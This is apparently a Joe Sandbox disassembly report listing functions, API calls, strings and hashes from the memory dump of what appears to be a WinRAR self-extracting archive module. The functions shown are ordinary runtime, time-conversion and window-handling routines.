Instruction Fuzzy Hash: 9E4168B2900299ADDF61EB61CD45DEE73BCAF45340F0048A5B659F3053DB389BC99B60

Uniqueness

Uniqueness Score: -1.00%

Function 000F1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 000F122E

Part of subcall function 000EB146: GetVersionExW.KERNEL32(?), ref: 000EB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 000F1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 000F1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000F1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 000F1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 000F1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000F12CF
__aullrem.LIBCMT ref: 000F1379

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 6f80c847b760e66bb26525b8c5c83c092be34af051e6bbe0d2c5cbe83373109f
Instruction ID: 3ba4bd8657dd4225a7680de525eb53968591282f4e838f978a5379ce8679fc95
Opcode Fuzzy Hash: 6f80c847b760e66bb26525b8c5c83c092be34af051e6bbe0d2c5cbe83373109f
Instruction Fuzzy Hash: 804116B1508305AFC754DF65C8849ABFBE9FF88314F04892EF696C2610E734E649DB52

Uniqueness

Uniqueness Score: -1.00%

Function 000E2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 000E2536

Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5

Part of subcall function 000F05DA: _wcslen.LIBCMT ref: 000F05E0

Strings

;%u, xrefs: 000E2523
x%u, xrefs: 000E26FD
xc%u, xrefs: 000E275A

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 42867000ca51823bf718efaecf09aad58a28560c458ccf939e9fbed2b0ac7f25
Instruction ID: e1d6e0a9d606aab49dbffd45619426177552d9ababc5aecc2d882deeb863305c
Opcode Fuzzy Hash: 42867000ca51823bf718efaecf09aad58a28560c458ccf939e9fbed2b0ac7f25
Instruction Fuzzy Hash: E4F147716043C09FDB25EB268995BFE77DE6F90300F08056DED86BB283CB619946C762

Uniqueness

Uniqueness Score: -1.00%

Function 000F9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000F9D0A

Strings

<style>, xrefs: 000F9E30
>, xrefs: 000F9D4B
<br>, xrefs: 000F9DFE
</p>, xrefs: 000F9DE8
</style>, xrefs: 000F9E52

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: c0a160a543ab55e2d6a332b77fcff5069f9b61a5d4ab18fbd7f48ff063bce2cb
Instruction ID: 78a5fdd6e1131c4b8854082c35033097c689c4659fdd8f5362f572acdea54531
Opcode Fuzzy Hash: c0a160a543ab55e2d6a332b77fcff5069f9b61a5d4ab18fbd7f48ff063bce2cb
Instruction Fuzzy Hash: 22517B66B0032B95DB709A659C117B673E0DFA0750F79042BFFC18B9C0FBA58C81E261

Uniqueness

Uniqueness Score: -1.00%

Function 0010F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0010FE02,00000000,00000000,00000000,00000000,00000000,0010529F), ref: 0010F6CF
__fassign.LIBCMT ref: 0010F74A
__fassign.LIBCMT ref: 0010F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0010F78B
WriteFile.KERNEL32(?,00000000,00000000,0010FE02,00000000,?,?,?,?,?,?,?,?,?,0010FE02,00000000), ref: 0010F7AA
WriteFile.KERNEL32(?,00000000,00000001,0010FE02,00000000,?,?,?,?,?,?,?,?,?,0010FE02,00000000), ref: 0010F7E3

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: bfe10e206da50fc9f45cac83ebb0ba3474feca1277041f30565f3f15f20b92d7
Instruction ID: 7e3c8f91b600b9904949057d0544f57a11c66ab8c2a68faf93a2f384940bc385
Opcode Fuzzy Hash: bfe10e206da50fc9f45cac83ebb0ba3474feca1277041f30565f3f15f20b92d7
Instruction Fuzzy Hash: 5751A7B5E002499FCB14CFA4DC55AEEBBF4EF09300F14816EE595E7691D770A941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00102900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00102937
___except_validate_context_record.LIBVCRUNTIME ref: 0010293F
_ValidateLocalCookies.LIBCMT ref: 001029C8
__IsNonwritableInCurrentImage.LIBCMT ref: 001029F3
_ValidateLocalCookies.LIBCMT ref: 00102A48

Strings

csm, xrefs: 001029DD

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3319d8adad8ec966c3b3934b0b53fea53fe7cd1bb663e12ed37caa1a0c12a12f
Instruction ID: 086d2dfe45c1d786c1d1f9296af3a75697226beaf18069c9e69989eb0c9168f3
Opcode Fuzzy Hash: 3319d8adad8ec966c3b3934b0b53fea53fe7cd1bb663e12ed37caa1a0c12a12f
Instruction Fuzzy Hash: B641C534A00218EFCF14DF68C889ADEBBF5AF44328F148055E895AB3D2D7B1DA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 000F9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 000F9EEE
GetWindowRect.USER32(?,00000000), ref: 000F9F44
ShowWindow.USER32(?,00000005,00000000), ref: 000F9FDB
SetWindowTextW.USER32(?,00000000), ref: 000F9FE3
ShowWindow.USER32(00000000,00000005), ref: 000F9FF9

Strings

RarHtmlClassName, xrefs: 000F9FA5

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 1975594bd6604fd8f8e2be3a5cf8459856237fc0b1ea7fb33988e491da8ca171
Instruction ID: 54fc6242f7078fea3221cc1da78714994d95da2aa3288150992e132416715588
Opcode Fuzzy Hash: 1975594bd6604fd8f8e2be3a5cf8459856237fc0b1ea7fb33988e491da8ca171
Instruction Fuzzy Hash: 84410471104314EFCB615F64DC48F6BBBA8FF49B01F008568FA5A994A2CB34E948DF61

Uniqueness

Uniqueness Score: -1.00%

Function 000F9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000F995E
_wcslen.LIBCMT ref: 000F9993

Strings

, xrefs: 000F99B0
 , xrefs: 000F9A21
<br>, xrefs: 000F99DF
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 000F9987

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 9a395e65f7b615e1ca9d797b10e2e922f43ad2228fd038ff9368c07af519ee8a
Instruction ID: 2f3e35bf12ed474b351e9083a12c1b0de098677693e68c782e1b067d4434c221
Opcode Fuzzy Hash: 9a395e65f7b615e1ca9d797b10e2e922f43ad2228fd038ff9368c07af519ee8a
Instruction Fuzzy Hash: 4231C43264430956D634AF549C02B7B73E4EB90720F60442FF6D2472C0FBD1AD8093E2

Uniqueness

Uniqueness Score: -1.00%

Function 0010C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0010C868: _free.LIBCMT ref: 0010C891

_free.LIBCMT ref: 0010C8F2

Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4

_free.LIBCMT ref: 0010C8FD
_free.LIBCMT ref: 0010C908
_free.LIBCMT ref: 0010C95C
_free.LIBCMT ref: 0010C967
_free.LIBCMT ref: 0010C972
_free.LIBCMT ref: 0010C97D

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 63c310ebffe47dcccc7682a68f13d90b88e7e13bcb9a28151a88c95d78f92bdc
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 09112171594B09AAE520B7B1CC07FCB7BAC9F28B00F408E16B2DD660D2DBF5B5058B94

Uniqueness

Uniqueness Score: -1.00%

Function 000FE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,000FE669,000FE5CC,000FE86D), ref: 000FE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000FE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000FE630

Strings

KERNEL32.DLL, xrefs: 000FE600
ReleaseSRWLockExclusive, xrefs: 000FE625
AcquireSRWLockExclusive, xrefs: 000FE615

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 5e55ed875849606c7724322ce75cc3dbc471d73f3b54819fbed0fb156313be0a
Instruction ID: 9d438a3d23a567b27d083be95c36965ed5adc9cee7ba2b5801c5c8047bc789ca
Opcode Fuzzy Hash: 5e55ed875849606c7724322ce75cc3dbc471d73f3b54819fbed0fb156313be0a
Instruction Fuzzy Hash: 21F0C2317807AEAB4BA14E64DD845BA23CA6B2A7D1304443AEB05D7D30EB14CCD17B90

Uniqueness

Uniqueness Score: -1.00%

Function 000F146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 000F14C2

Part of subcall function 000EB146: GetVersionExW.KERNEL32(?), ref: 000EB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000F14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 000F1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 000F1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 000F1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 000F1533

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 5b692cf2fb866007877d78f5b1fc62d73ede575ad3cbaa2ccd64d5fa1c4c39ce
Instruction ID: 6ec152f46ee3eee81b602dee1a70fef0bb5830637beb3fa2acd5611759fa0554
Opcode Fuzzy Hash: 5b692cf2fb866007877d78f5b1fc62d73ede575ad3cbaa2ccd64d5fa1c4c39ce
Instruction Fuzzy Hash: E731E875208345AFC704DFA8C98499BBBF8BF98754F048A1EF995C3610E730D549CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00102AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00102AF1,001002FC,000FFA34), ref: 00102B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00102B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00102B2F
SetLastError.KERNEL32(00000000,00102AF1,001002FC,000FFA34), ref: 00102B81

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 91757ecb53331e7411944902da0197abf02879f79ca40837da120f10be38b075
Instruction ID: 7c02bd3fe3e356e96f35f4d0c0b83654b6f65b245336f3cb1e17073e8125b237
Opcode Fuzzy Hash: 91757ecb53331e7411944902da0197abf02879f79ca40837da120f10be38b075
Instruction Fuzzy Hash: 5101D8331183116DF6192AF47D8DA5A7B99FB117F47604739F9A0554E0EFE24C409244

Uniqueness

Uniqueness Score: -1.00%

Function 001097E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00121098,00104674,00121098,?,?,001040EF,?,?,00121098), ref: 001097E9
_free.LIBCMT ref: 0010981C
_free.LIBCMT ref: 00109844
SetLastError.KERNEL32(00000000,?,00121098), ref: 00109851
SetLastError.KERNEL32(00000000,?,00121098), ref: 0010985D
_abort.LIBCMT ref: 00109863

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 4ca35b4ff6de4994d1e8dacfc2e1d4ffd724c686877faf1f4d989bf8056de009
Instruction ID: 7d7bd6a994bc18b0db7cfae7f1dcf0a896d78ff18d5c00843459761bd279897c
Opcode Fuzzy Hash: 4ca35b4ff6de4994d1e8dacfc2e1d4ffd724c686877faf1f4d989bf8056de009
Instruction Fuzzy Hash: FFF0283514470567C61A3374BD2AA5B3AA98FF2B70F21C225F9E8A27E7FFF088414165

Uniqueness

Uniqueness Score: -1.00%

Function 000FDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 000FDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FDC72
TranslateMessage.USER32(?), ref: 000FDC7C
DispatchMessageW.USER32(?), ref: 000FDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 000FDC91

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: b2a2371c052a5d2842f10a6c947bd9d172df559e4b5abc101116efd59b694eb4
Instruction ID: 273424b5fc4fe1794347b463ec9300c194e7b9ec946445c77bd07f8bc26cdaf5
Opcode Fuzzy Hash: b2a2371c052a5d2842f10a6c947bd9d172df559e4b5abc101116efd59b694eb4
Instruction Fuzzy Hash: 9FF0AF32A00229BBCB206BA1ED0CDDF7FBDEF42791B004121F61AD2420D634C686C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 000EC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 000F05DA: _wcslen.LIBCMT ref: 000F05E0

Part of subcall function 000EB92D: _wcsrchr.LIBVCRUNTIME ref: 000EB944

_wcslen.LIBCMT ref: 000EC197
_wcslen.LIBCMT ref: 000EC1DF

Strings

.sfx, xrefs: 000EC11A
.exe, xrefs: 000EC10B
.rar, xrefs: 000EC0E1, 000EC134

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: f61dc3b62e36bac90e50ef30336f404ecfb1ebcee836d6e041f946742ad48921
Instruction ID: c90434197d368a29fa45199fce87c72975a29f6423544e06501c5e9ea93f7a50
Opcode Fuzzy Hash: f61dc3b62e36bac90e50ef30336f404ecfb1ebcee836d6e041f946742ad48921
Instruction Fuzzy Hash: 914125216003D59DE735AF258802EBBB3E8EF42744F10094EF9917B082EB625D82D351

Uniqueness

Uniqueness Score: -1.00%

Function 000FCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 000FCE9D

Part of subcall function 000EB690: _wcslen.LIBCMT ref: 000EB696

_swprintf.LIBCMT ref: 000FCED1

Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5

SetDlgItemTextW.USER32(?,00000066,0012946A), ref: 000FCEF1
EndDialog.USER32(?,00000001), ref: 000FCFFE

Strings

%s%s%u, xrefs: 000FCEC6

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 6b3ca35602409f63efea91d481814966177353220e172497e293d373b6da7b0f
Instruction ID: a5927a7fe389274d76de989b363e07acf8221a412b5d159b8c87675e5724d95d
Opcode Fuzzy Hash: 6b3ca35602409f63efea91d481814966177353220e172497e293d373b6da7b0f
Instruction Fuzzy Hash: 4B4190B190025DAADF249B90DD45EFE77FDEB05300F4080A6FB09E7441EA708A849F61

Uniqueness

Uniqueness Score: -1.00%

Function 000EBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000EBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,000EA275,?,?,00000800,?,000EA23A,?,000E755C), ref: 000EBBC5
_wcslen.LIBCMT ref: 000EBC3B

Strings

